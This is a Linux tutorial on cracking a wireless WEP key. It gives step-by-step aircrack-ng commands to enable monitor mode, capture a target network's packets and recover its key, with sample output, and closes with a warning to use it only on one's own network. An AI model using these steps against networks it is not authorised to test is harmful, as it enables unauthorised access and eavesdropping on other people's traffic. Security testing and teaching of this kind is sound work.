This article shortly describes simple steps on how to crack a wireless WEP key using aircrack-ng software. This can be done by sniffing a wireless network, capturing encrypted packets and running appropriate encryption cracking program in an attempt to decrypt captured data. WEP ( Wired Equivalent Privacy ) is quite easy to crack as it uses only one key to encrypt all traffic.
The basic principle is that communication between two nodes on the network is based on the MAC address. Each host receives packets only intended for MAC address of its own interface. The same principle also applies for wireless networks. However, if one node sets its own network card into promiscuous mode it will also receive packets which are not addressed for its own MAC address.
To crack the WEP key, a hacker needs to capture sample packets not intended for his own network interface and run crack program to compare testing keys against WEP key bundled with captured packets in attempt of decryption. The key which fits to decrypt captured packets is the key used by wireless network to encrypt its entire wireless communication with its connected stations.
In the following sections, we’ll guide you through aircrack-ng installation on Linux, then show you the step by step instructions to crack a wireless WEP key. The guide assumes that your have wireless network card installed and that it supports monitor mode.
In this tutorial you will learn:
- How to install aircrack-ng on major Linux distros
- How to crack a wireless WEP key using aircrack-ng
Category | Requirements, Conventions or Software Version Used |
---|---|
System | Any Linux distro |
Software | aircrack-ng |
Other | Privileged access to your Linux system as root or via the sudo command. |
Conventions |
# – requires given linux commands to be executed with root privileges either directly as a root user or by use of sudo command$ – requires given linux commands to be executed as a regular non-privileged user |
Install aircrack-ng on major Linux distros
To get started, you will need the aircrack-ng software installed on your system. You can use the appropriate command below to install the program with your system’s package manager.
To install aircrack-ng on Ubuntu, Debian, and Linux Mint:
$ sudo apt install aircrack-ng
To install aircrack-ng on CentOS, Fedora, AlmaLinux, and Red Hat:
$ sudo dnf install aircrack-ng
To install aircrack-ng on Arch Linux and Manjaro:
$ sudo pacman -S aircrack-ng
Crack wireless WEP key
- First we need to identify the name of our wireless network interface. If your wireless network card is installed correctly, an
iwconfig
command will reveal the name of your wireless network interface:$ iwconfig wlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
The output shows that in our case, the interface name is
wlan0
. - Next, turn on monitor mode for the wireless interface.
# airmon-ng start wlan0 Interface Chipset Driver wlan0 rtl8180 - [phy0] (monitor mode enabled on mon0)
The result of the command will give you the name of the new virtual interface. It tends to be
mon0
. - Dump the results of the monitor into a terminal, so you can see them.
# airodump-ng mon0
You can see a table of data pertaining to wireless networks in your area. You only need information about the network you wish to crack. Look for it, and note the BSSID and the channel that it’s on.
- Next, you’re going to log the results of a scan to a file. That capture log will be needed by Aircrack to run a brute force attack on the network later. To get your capture, you’re going to run the same command as before, but you’ll specify your BSSID, channel, and the log location.
# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
Fill in your actual information before running the command, and leave it running.
- As a last step we crack WEP key by using captured packets and aircrack-ng command. All captured packets are now stored in
wep-crack-01.cap
file.# aircrack-ng -z wep-crack-01.cap
Your output should look something like this:
Opening wep-crack-01.cap Read 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0) Index number of target network ? 1 Aircrack-ng 1.0 rc1 [00:00:13] Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! [ 3F:F3:8E:6E:98 ] Decrypted correctly: 100%
Closing Thoughts
In this guide, we saw how to install aircrack-ng on Linux and use the software to crack a wireless WEP key. Remember this process should only ever be used to test your own security or for educational purposes. Using it on someone else’s network is illegal.